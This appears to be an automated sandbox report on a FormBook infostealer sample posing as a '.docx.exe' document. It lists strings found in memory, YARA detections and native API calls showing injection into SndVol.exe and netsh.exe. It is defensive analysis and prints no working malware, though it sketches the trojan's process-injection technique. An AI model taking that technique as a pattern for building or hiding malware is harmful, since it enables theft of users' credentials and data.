          Source: explorer.exe, 00000006.00000003.3107012452.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4174806858.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1799656853.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4178769883.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.SndVol.exe.47c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.SndVol.exe.47c0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.211c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe PID: 6928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SndVol.exe PID: 2664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 4948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BB118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_029BB118
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B7A2C NtAllocateVirtualMemory,0_2_029B7A2C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_029BDC8C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029BDC04
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B7D78 NtWriteVirtualMemory,0_2_029B7D78
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_029BDD70
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B7A2A NtAllocateVirtualMemory,0_2_029B7A2A
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_029BDBB0
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B8D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_029B8D70
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029B8D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_029B8D6E
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA460 NtClose,5_2_047DA460
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA510 NtAllocateVirtualMemory,5_2_047DA510
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA330 NtCreateFile,5_2_047DA330
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA3E0 NtReadFile,5_2_047DA3E0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA45B NtClose,5_2_047DA45B
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_047DA48A NtReadFile,5_2_047DA48A
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_365D2E80
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_365D2EA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2F30 NtCreateSection,LdrInitializeThunk,5_2_365D2F30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2FE0 NtCreateFile,LdrInitializeThunk,5_2_365D2FE0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_365D2F90
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2FB0 NtResumeThread,LdrInitializeThunk,5_2_365D2FB0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_365D2C70
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_365D2CA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_365D2D10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_365D2D30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2DD0 NtDelayExecution,LdrInitializeThunk,5_2_365D2DD0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_365D2DF0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2AD0 NtReadFile,LdrInitializeThunk,5_2_365D2AD0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2B60 NtClose,LdrInitializeThunk,5_2_365D2B60
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_365D2BF0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D35C0 NtCreateMutant,5_2_365D35C0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D3010 NtOpenDirectoryObject,5_2_365D3010
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D3090 NtSetValueKey,5_2_365D3090
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D3D70 NtOpenThread,5_2_365D3D70
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D3D10 NtOpenProcessToken,5_2_365D3D10
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D39B0 NtGetContextThread,5_2_365D39B0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D4650 NtSuspendThread,5_2_365D4650
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D4340 NtSetContextThread,5_2_365D4340
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2E30 NtWriteVirtualMemory,5_2_365D2E30
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2EE0 NtQueueApcThread,5_2_365D2EE0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2F60 NtCreateProcessEx,5_2_365D2F60
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2FA0 NtQuerySection,5_2_365D2FA0
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2C60 NtCreateKey,5_2_365D2C60
          Source: C:\Windows\SysWOW64\SndVol.exeCode function: 5_2_365D2C00 NtQueryInformationProcess,5_2_365D2C00
